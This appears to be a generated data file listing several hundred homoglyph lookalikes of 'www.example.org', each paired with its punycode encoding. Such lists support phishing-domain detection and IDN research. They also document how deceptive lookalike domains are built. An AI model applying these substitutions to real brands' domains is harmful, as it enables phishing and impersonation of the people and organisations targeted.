{'domain_punnycode': b'www.xn--xample-9yc.org', 'domain': 'www.ɛxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝐴mple.org'}
{'domain_punnycode': b'www.xn--exmple-4nf.org', 'domain': 'www.exаmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝘦xample.org'}
{'domain_punnycode': b'www.examPle.org', 'domain': 'www.examPle.org'}
{'domain_punnycode': b'www.xn--xample-ht4v.org', 'domain': 'www.ꓰxample.org'}
{'domain_punnycode': b'www.xn--xample-2of.org', 'domain': 'www.еxample.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝞪mple.org'}
{'domain_punnycode': b'www.xn--exampe-7d8c.org', 'domain': 'www.examp╽e.org'}
{'domain_punnycode': b'www.xn--exmple-48b.org', 'domain': 'www.exǝmple.org'}
{'domain_punnycode': b'www.xn--eample-ii11b.org', 'domain': 'www.e𑀌ample.org'}
{'domain_punnycode': b'www.xn--exmple-jx3a.org', 'domain': 'www.exᓇmple.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝜺.org'}
{'domain_punnycode': b'www.xn--exampl-8qb.org', 'domain': 'www.examplƂ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examＰle.org'}
{'domain_punnycode': b'www.xn--eample-3j29a.org', 'domain': 'www.e𐌗ample.org'}
{'domain_punnycode': b'www.xn--exmple-xv2a.org', 'domain': 'www.exᐐmple.org'}
{'domain_punnycode': b'www.xn--exampe-fh29a.org', 'domain': 'www.examp𐌉e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝔼xample.org'}
{'domain_punnycode': b'www.xn--xample-oh6v.org', 'domain': 'www.ꘓxample.org'}
{'domain_punnycode': b'www.xn--exmple-xv49a.org', 'domain': 'www.ex\U000104b0mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝗽le.org'}
{'domain_punnycode': b'www.xn--exampe-m70a.org', 'domain': 'www.exampዬe.org'}
{'domain_punnycode': b'www.xn--xample-oyc.org', 'domain': 'www.ɘxample.org'}
{'domain_punnycode': b'www.xn--examle-s65b.org', 'domain': 'www.examᴩle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝕰.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝑬xample.org'}
{'domain_punnycode': b'www.xn--exaple-r3c.org', 'domain': 'www.exaⱮple.org'}
{'domain_punnycode': b'www.xn--exampl-g5a.org', 'domain': 'www.examplě.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝗉le.org'}
{'domain_punnycode': b'www.xn--exampe-73z.org', 'domain': 'www.exampሬe.org'}
{'domain_punnycode': b'www.xn--exampl-uj9b.org', 'domain': 'www.examplῈ.org'}
{'domain_punnycode': b'www.xn--exmple-4nf.org', 'domain': 'www.exАmple.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝜌le.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝑰e.org'}
{'domain_punnycode': b'www.xn--exampl-gva.org', 'domain': 'www.examplÉ.org'}
{'domain_punnycode': b'www.xn--xample-h21c.org', 'domain': 'www.℮xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examｐle.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝕀e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝙚xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝘈mple.org'}
{'domain_punnycode': b'www.xn--exmple-qw8b.org', 'domain': 'www.exἌmple.org'}
{'domain_punnycode': b'www.xn--xample-huf.org', 'domain': 'www.Ѐxample.org'}
{'domain_punnycode': b'www.xn--xample-v80b.org', 'domain': 'www.ᧉxample.org'}
{'domain_punnycode': b'www.xn--exmple-cx8b.org', 'domain': 'www.exἏmple.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.eχample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝓮xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝕏ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝑝le.org'}
{'domain_punnycode': b'www.xn--eample-3v8d.org', 'domain': 'www.eⲬample.org'}
{'domain_punnycode': b'www.xn--examle-zxb.org', 'domain': 'www.examƥle.org'}
{'domain_punnycode': b'www.xn--examle-ez1c.org', 'domain': 'www.exam℞le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝐄.org'}
{'domain_punnycode': b'www.xn--exampe-m7f.org', 'domain': 'www.exampґe.org'}
{'domain_punnycode': b'www.xn--exaple-kdf.org', 'domain': 'www.exaϺple.org'}
{'domain_punnycode': b'www.cxample.org', 'domain': 'www.ⅽxample.org'}
{'domain_punnycode': b'www.xn--exmple-4lg.org', 'domain': 'www.exӕmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampⅼe.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.examp𝞘e.org'}
{'domain_punnycode': b'www.xn--exampe-tr3a.org', 'domain': 'www.exampᒪe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝕖.org'}
{'domain_punnycode': b'www.xn--exmple-cze9007c.org', 'domain': 'www.exᾌmple.org'}
{'domain_punnycode': b'www.xn--exmple-xta.org', 'domain': 'www.exâmple.org'}
{'domain_punnycode': b'www.xn--exmple-chc.org', 'domain': 'www.exȀmple.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.examϱle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝙡e.org'}
{'domain_punnycode': None, 'domain': 'www.exampﺎe.org'}
{'domain_punnycode': b'www.xn--exampe-fjc.org', 'domain': 'www.exampȋe.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝛒le.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝗜e.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.examplϵ.org'}
{'domain_punnycode': b'www.xn--exampl-ue4w.org', 'domain': 'www.examplᎬ.org'}
{'domain_punnycode': b'www.exam4le.org', 'domain': 'www.exam4le.org'}
{'domain_punnycode': b'www.xn--exampe-7839a.org', 'domain': 'www.examp𐐛e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝐱ample.org'}
{'domain_punnycode': b'www.xn--exampl-1o8d.org', 'domain': 'www.examplⲉ.org'}
{'domain_punnycode': b'www.xn--exampe-7s6a.org', 'domain': 'www.exampᚾe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝔵ample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝛆xample.org'}
{'domain_punnycode': b'www.xn--exampe-fvi.org', 'domain': 'www.examp١e.org'}
{'domain_punnycode': b'www.xn--exmple-qta.org', 'domain': 'www.exÁmple.org'}
{'domain_punnycode': b'www.xn--exampe-m6b.org', 'domain': 'www.exampǏe.org'}
{'domain_punnycode': b'www.xn--exampl-gof.org', 'domain': 'www.examplБ.org'}
{'domain_punnycode': b'www.xn--eample-3tg.org', 'domain': 'www.eӼample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝗺ple.org'}
{'domain_punnycode': b'www.xn--exmple-48c.org', 'domain': 'www.exɅmple.org'}
{'domain_punnycode': b'www.xn--eample-wm4a.org', 'domain': 'www.eᕁample.org'}
{'domain_punnycode': b'www.xn--exmple-4v9b.org', 'domain': 'www.exᾸmple.org'}
{'domain_punnycode': b'www.xn--exampe-060a.org', 'domain': 'www.exampዩe.org'}
{'domain_punnycode': b'www.xn--exampe-mcb.org', 'domain': 'www.exampĹe.org'}
{'domain_punnycode': b'www.xn--exmple-4xw.org', 'domain': 'www.exခmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝒶mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝕖xample.org'}
{'domain_punnycode': b'www.xn--examle-e97d.org', 'domain': 'www.examⱀle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝔞mple.org'}
{'domain_punnycode': b'www.xn--exampe-0q8d.org', 'domain': 'www.exampⲒe.org'}
{'domain_punnycode': b'www.xn--exampl-ufx.org', 'domain': 'www.examplၔ.org'}
{'domain_punnycode': b'www.xn--xample-htr.org', 'domain': 'www.౿xample.org'}
{'domain_punnycode': b'www.xn--examle-en4v.org', 'domain': 'www.examꓑle.org'}
{'domain_punnycode': b'www.xn--exampe-mq4v.org', 'domain': 'www.exampꓡe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝑒.org'}
{'domain_punnycode': b'www.xn--xample-vyc.org', 'domain': 'www.əxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝚖ple.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝛢mple.org'}
{'domain_punnycode': b'www.xn--xample-vfx.org', 'domain': 'www.ၕxample.org'}
{'domain_punnycode': b'www.xn--exmple-cf4w.org', 'domain': 'www.exꭿmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝓵e.org'}
{'domain_punnycode': b'www.xn--exmple-4yc.org', 'domain': 'www.exɚmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝓂ple.org'}
{'domain_punnycode': b'www.xn--exampe-tvf.org', 'domain': 'www.exampІe.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝐼e.org'}
{'domain_punnycode': b'www.xn--exampl-uva.org', 'domain': 'www.examplË.org'}
{'domain_punnycode': b'www.xn--xample-vk4w.org', 'domain': 'www.Ꮛxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝕝e.org'}
{'domain_punnycode': b'www.xn--exampe-m5c.org', 'domain': 'www.exampɺe.org'}
{'domain_punnycode': b'www.xn--exampl-1k4w.org', 'domain': 'www.examplꮛ.org'}
{'domain_punnycode': b'www.xn--exampl-gzc.org', 'domain': 'www.examplℇ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝓛e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝐿e.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝜠xample.org'}
{'domain_punnycode': b'www.xn--xample-vp29a.org', 'domain': 'www.𐌴xample.org'}
{'domain_punnycode': b'www.xn--eample-bw9d.org', 'domain': 'www.eⵝample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝙴.org'}
{'domain_punnycode': b'www.xn--xample-9oc.org', 'domain': 'www.Ȩxample.org'}
{'domain_punnycode': b'www.xn--exampe-mo7c.org', 'domain': 'www.examp￨e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝘓e.org'}
{'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp1e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampＬe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝕩ample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝝚xample.org'}
{'domain_punnycode': b'www.xn--xample-2o9d.org', 'domain': 'www.ⴹxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exａmple.org'}
{'domain_punnycode': b'www.xn--exampl-8o9d.org', 'domain': 'www.examplⴹ.org'}
{'domain_punnycode': b'www.xn--examle-66f.org', 'domain': 'www.examҎle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝗹e.org'}
{'domain_punnycode': b'www.xn--eample-bsf.org', 'domain': 'www.eХample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝙖mple.org'}
{'domain_punnycode': b'www.xn--xample-h4a.org', 'domain': 'www.Ėxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝓐mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝘗le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝘼mple.org'}
{'domain_punnycode': b'www.xn--examle-62b.org', 'domain': 'www.examƿle.org'}
{'domain_punnycode': b'www.xn--exaple-rl6b.org', 'domain': 'www.exaᵯple.org'}
{'domain_punnycode': b'www.xn--exampe-m9m.org', 'domain': 'www.examp।e.org'}
{'domain_punnycode': b'www.xn--exaple-rkg.org', 'domain': 'www.exaӍple.org'}
{'domain_punnycode': b'www.xn--exampe-me8c.org', 'domain': 'www.examp╿e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝑥ample.org'}
{'domain_punnycode': b'www.xn--xample-o739a.org', 'domain': 'www.𐐔xample.org'}
{'domain_punnycode': b'www.xn--eample-3b8c.org', 'domain': 'www.e╳ample.org'}
{'domain_punnycode': b'www.xn--exmple-cze1007c.org', 'domain': 'www.exᾋmple.org'}
{'domain_punnycode': b'www.xn--xample-vt5a.org', 'domain': 'www.ᘓxample.org'}
{'domain_punnycode': b'www.xn--exampe-0vf.org', 'domain': 'www.exampїe.org'}
{'domain_punnycode': b'www.xn--exampe-7p5c.org', 'domain': 'www.examp⎬e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.Ｅxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝑚ple.org'}
{'domain_punnycode': b'www.xn--exampl-1tf.org', 'domain': 'www.examplэ.org'}
{'domain_punnycode': b'www.xn--exampe-fwa.org', 'domain': 'www.exampÎe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝒆.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝛭ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝘟ample.org'}
{'domain_punnycode': b'www.xn--xample-ova.org', 'domain': 'www.ëxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝙰mple.org'}
{'domain_punnycode': b'www.xn--exmple-ct5a.org', 'domain': 'www.exᘐmple.org'}
{'domain_punnycode': b'www.xn--exampe-t2e.org', 'domain': 'www.exampϊe.org'}
{'domain_punnycode': b'www.xn--exmple-4w8b.org', 'domain': 'www.exἎmple.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.examp𝚰e.org'}
{'domain_punnycode': b'www.xn--exampe-0kg.org', 'domain': 'www.exampӀe.org'}
{'domain_punnycode': b'www.xn--exampl-1z5b.org', 'domain': 'www.examplᴇ.org'}
{'domain_punnycode': b'www.xn--xample-9gg.org', 'domain': 'www.ҽxample.org'}
{'domain_punnycode': b'www.xn--exampl-n6e.org', 'domain': 'www.examplϜ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝙋le.org'}
{'domain_punnycode': b'www.xn--exampl-uyc.org', 'domain': 'www.examplɘ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝖬ple.org'}
{'domain_punnycode': b'www.xn--exmple-cdg.org', 'domain': 'www.exҨmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ℯxample.org'}
{'domain_punnycode': b'www.xn--exmple-jxc.org', 'domain': 'www.exɒmple.org'}
{'domain_punnycode': b'www.xn--xample-9uf.org', 'domain': 'www.Єxample.org'}
{'domain_punnycode': b'www.xn--exaple-k03w.org', 'domain': 'www.exaꬺple.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.exampιe.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝞔xample.org'}
{'domain_punnycode': b'www.xn--examle-lp4w.org', 'domain': 'www.examᏢle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝘌.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝚸le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝒂mple.org'}
{'domain_punnycode': b'www.xn--eample-3c6a.org', 'domain': 'www.e᙮ample.org'}
{'domain_punnycode': b'www.exampLe.org', 'domain': 'www.exampLe.org'}
{'domain_punnycode': b'www.xn--xample-2hc.org', 'domain': 'www.Ȅxample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝛦xample.org'}
{'domain_punnycode': b'www.xn--exmple-4s4v.org', 'domain': 'www.exꓮmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝕻le.org'}
{'domain_punnycode': b'www.xn--exampe-mcb.org', 'domain': 'www.exampĺe.org'}
{'domain_punnycode': b'www.xn--exampl-83a.org', 'domain': 'www.examplĕ.org'}
{'domain_punnycode': b'www.xn--exampe-0c1c.org', 'domain': 'www.examp₮e.org'}
{'domain_punnycode': b'www.xn--examle-66f.org', 'domain': 'www.examҏle.org'}
{'domain_punnycode': b'www.xn--exampe-ts4c.org', 'domain': 'www.examp⌊e.org'}
{'domain_punnycode': b'www.xn--examle-l6e.org', 'domain': 'www.examϜle.org'}
{'domain_punnycode': b'www.xn--exampl-nic.org', 'domain': 'www.examplȇ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝐞.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampℓe.org'}
{'domain_punnycode': None, 'domain': 'www.exampןe.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝞀le.org'}
{'domain_punnycode': b'www.exampse.org', 'domain': 'www.exampſe.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝛲le.org'}
{'domain_punnycode': b'www.xn--exampe-tvk.org', 'domain': 'www.examp߁e.org'}
{'domain_punnycode': b'www.xn--exampe-71c.org', 'domain': 'www.exampɩe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝓮.org'}
{'domain_punnycode': b'www.xn--exampl-1y3w.org', 'domain': 'www.examplꬲ.org'}
{'domain_punnycode': b'www.xn--exaple-yi29a.org', 'domain': 'www.exa𐌑ple.org'}
{'domain_punnycode': b'www.xn--xample-vo8d.org', 'domain': 'www.Ⲉxample.org'}
{'domain_punnycode': b'www.xn--exmple-czw.org', 'domain': 'www.exဇmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examplℰ.org'}
{'domain_punnycode': b'www.xn--exampl-nic.org', 'domain': 'www.examplȆ.org'}
{'domain_punnycode': b'www.xn--exaple-5r8d.org', 'domain': 'www.exaⲘple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝙢ple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examplⅇ.org'}
{'domain_punnycode': b'www.xn--examle-lp4w.org', 'domain': 'www.examꮲle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exaｍple.org'}
{'domain_punnycode': b'www.xn--exmple-4ta.org', 'domain': 'www.exãmple.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.examplε.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.eΧample.org'}
{'domain_punnycode': b'www.xn--exmple-xk0b.org', 'domain': 'www.exᥑmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exaℳple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exＡmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝑙e.org'}
{'domain_punnycode': b'www.xn--xample-hic.org', 'domain': 'www.Ȇxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.eⅹample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examplｅ.org'}
{'domain_punnycode': b'www.examplE.org', 'domain': 'www.examplE.org'}
{'domain_punnycode': b'www.xn--exampe-0t5c.org', 'domain': 'www.examp⎿e.org'}
{'domain_punnycode': b'www.xn--exaple-yg4w.org', 'domain': 'www.exaᎷple.org'}
{'domain_punnycode': b'www.xn--exmple-qlg.org', 'domain': 'www.exӓmple.org'}
{'domain_punnycode': b'www.xn--exmple-q339a.org', 'domain': 'www.ex𐐀mple.org'}
{'domain_punnycode': b'www.xn--exmple-cze5896c.org', 'domain': 'www.exᾉmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝕬mple.org'}
{'domain_punnycode': b'www.xn--xample-2hc.org', 'domain': 'www.ȅxample.org'}
{'domain_punnycode': b'www.xn--exampe-0dd.org', 'domain': 'www.exampʟe.org'}
{'domain_punnycode': b'www.xn--exmple-jf5a.org', 'domain': 'www.exᗋmple.org'}
{'domain_punnycode': b'www.xn--exampl-nmg.org', 'domain': 'www.examplӖ.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝞎le.org'}
{'domain_punnycode': b'www.xn--exampl-nuf.org', 'domain': 'www.examplЀ.org'}
{'domain_punnycode': b'www.xn--exmple-ce4w.org', 'domain': 'www.exᎪmple.org'}
{'domain_punnycode': b'www.xn--eample-wc6a.org', 'domain': 'www.e᙭ample.org'}
{'domain_punnycode': b'www.xn--exmple-xta.org', 'domain': 'www.exÂmple.org'}
{'domain_punnycode': b'www.xn--exampe-08a.org', 'domain': 'www.exampĭe.org'}
{'domain_punnycode': b'www.xn--xample-23a.org', 'domain': 'www.Ĕxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝐸.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝖫e.org'}
{'domain_punnycode': b'www.xn--exampe-0l29a.org', 'domain': 'www.examp𐌠e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝐀mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝒳ample.org'}
{'domain_punnycode': b'www.xn--xample-94a.org', 'domain': 'www.Ěxample.org'}
{'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp𝟷e.org'}
{'domain_punnycode': b'www.xn--exmple-cw9b.org', 'domain': 'www.exᾹmple.org'}
{'domain_punnycode': b'www.xn--xample-hva.org', 'domain': 'www.Êxample.org'}
{'domain_punnycode': b'www.xn--exampe-0s4c.org', 'domain': 'www.examp⌋e.org'}
{'domain_punnycode': b'www.xn--exampe-tof.org', 'domain': 'www.exampГe.org'}
{'domain_punnycode': b'www.xn--exampl-83a.org', 'domain': 'www.examplĔ.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.examp𝜤e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exaⅿple.org'}
{'domain_punnycode': b'www.xn--xample-9uc.org', 'domain': 'www.Ɇxample.org'}
{'domain_punnycode': b'www.xn--exampl-gpc.org', 'domain': 'www.examplȨ.org'}
{'domain_punnycode': b'www.xn--exampl-n4a.org', 'domain': 'www.examplė.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝐄xample.org'}
{'domain_punnycode': b'www.xn--exmple-clg.org', 'domain': 'www.exӐmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝐥e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝕰xample.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝛼mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝒜mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exaⅯple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝖊.org'}
{'domain_punnycode': b'www.xn--exampl-1339a.org', 'domain': 'www.exampl𐐁.org'}
{'domain_punnycode': b'www.xn--exampl-nva.org', 'domain': 'www.examplÊ.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝚨mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝚎.org'}
{'domain_punnycode': b'www.xn--eample-bfg.org', 'domain': 'www.eҳample.org'}
{'domain_punnycode': b'www.xn--examle-zxb.org', 'domain': 'www.examƤle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝔈.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝓪mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝖤xample.org'}
{'domain_punnycode': b'www.xn--exampl-1o8d.org', 'domain': 'www.examplⲈ.org'}
{'domain_punnycode': b'www.xn--eample-3v8d.org', 'domain': 'www.eⲭample.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝙸e.org'}
{'domain_punnycode': b'www.xn--xample-9uf.org', 'domain': 'www.єxample.org'}
{'domain_punnycode': b'www.xn--exampe-fd4w.org', 'domain': 'www.exampᎥe.org'}
{'domain_punnycode': b'www.xn--exmple-x92c.org', 'domain': 'www.ex𝜕mple.org'}
{'domain_punnycode': None, 'domain': 'www.exampﺍe.org'}
{'domain_punnycode': b'www.xn--exmple-cxc.org', 'domain': 'www.exɑmple.org'}
{'domain_punnycode': b'www.xn--eample-bi11b.org', 'domain': 'www.e𑀋ample.org'}
{'domain_punnycode': b'www.xn--exampe-m7f.org', 'domain': 'www.exampҐe.org'}
{'domain_punnycode': b'www.xn--exampl-uuf.org', 'domain': 'www.examplЁ.org'}
{'domain_punnycode': b'www.xn--exampe-0t4v.org', 'domain': 'www.exampꓲe.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝝦le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝕞ple.org'}
{'domain_punnycode': b'www.xn--xample-vz5b.org', 'domain': 'www.ᴇxample.org'}
{'domain_punnycode': b'www.xn--examle-ex4a.org', 'domain': 'www.examᕵle.org'}
{'domain_punnycode': b'www.xn--exampl-gvf.org', 'domain': 'www.examplє.org'}
{'domain_punnycode': b'www.xn--exampe-7va.org', 'domain': 'www.exampÍe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.eＸample.org'}
{'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝚳ple.org'}
{'domain_punnycode': b'www.xn--exampl-go4c.org', 'domain': 'www.exampl⋴.org'}
{'domain_punnycode': b'www.xn--examle-ld1c.org', 'domain': 'www.exam₱le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝓔xample.org'}
{'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp𝟏e.org'}
{'domain_punnycode': b'www.xn--exampe-mb49a.org', 'domain': 'www.examp𐑊e.org'}
{'domain_punnycode': b'www.xn--exampe-mt9d.org', 'domain': 'www.exampⵏe.org'}
{'domain_punnycode': b'www.xn--exampl-1p29a.org', 'domain': 'www.exampl𐌴.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝚬.org'}
{'domain_punnycode': b'www.xn--exmple-4ta.org', 'domain': 'www.exÃmple.org'}
{'domain_punnycode': b'www.xn--exmple-cng.org', 'domain': 'www.exӚmple.org'}
{'domain_punnycode': b'www.xn--xample-oe4w.org', 'domain': 'www.Ꭼxample.org'}
{'domain_punnycode': b'www.xn--exampe-mf4w.org', 'domain': 'www.exampᎰe.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝞔.org'}
{'domain_punnycode': b'www.xn--exampe-f3b.org', 'domain': 'www.exampǀe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝔐ple.org'}
{'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp𝟙e.org'}
{'domain_punnycode': b'www.xn--exampe-t37c.org', 'domain': 'www.examp╎e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝗟e.org'}
{'domain_punnycode': b'www.xn--xample-o3a.org', 'domain': 'www.ēxample.org'}
{'domain_punnycode': b'www.xn--examle-lf3a.org', 'domain': 'www.examᑭle.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝗠ple.org'}
{'domain_punnycode': b'www.xn--xample-9n4c.org', 'domain': 'www.⋴xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝘢mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝘮ple.org'}
{'domain_punnycode': b'www.xn--exampe-02c.org', 'domain': 'www.exampɭe.org'}
{'domain_punnycode': b'www.xn--xample-2qb.org', 'domain': 'www.Ƃxample.org'}
{'domain_punnycode': b'www.xn--xample-ova.org', 'domain': 'www.Ëxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝑴ple.org'}
{'domain_punnycode': b'www.xn--exampl-1yc.org', 'domain': 'www.examplə.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝙚.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝓅le.org'}
{'domain_punnycode': b'www.xn--examle-6qb.org', 'domain': 'www.examƂle.org'}
{'domain_punnycode': b'www.xn--xample-9ua.org', 'domain': 'www.Éxample.org'}
{'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝚾ample.org'}
{'domain_punnycode': b'www.xn--exmple-cua.org', 'domain': 'www.exÄmple.org'}
{'domain_punnycode': b'www.xn--exampe-0l4w.org', 'domain': 'www.exampᏐe.org'}
{'domain_punnycode': b'www.xn--examle-zf1c.org', 'domain': 'www.exam₽le.org'}
{'domain_punnycode': b'www.xn--exampe-71c.org', 'domain': 'www.exampƖe.org'}
{'domain_punnycode': b'www.xn--exmple-xoc.org', 'domain': 'www.exȦmple.org'}
{'domain_punnycode': b'www.xn--exampe-m2c.org', 'domain': 'www.exampⱢe.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.exΑmple.org'}
{'domain_punnycode': b'www.xn--exampl-gzc.org', 'domain': 'www.examplɛ.org'}
{'domain_punnycode': b'www.xn--exaple-yl0b.org', 'domain': 'www.exaᥖple.org'}
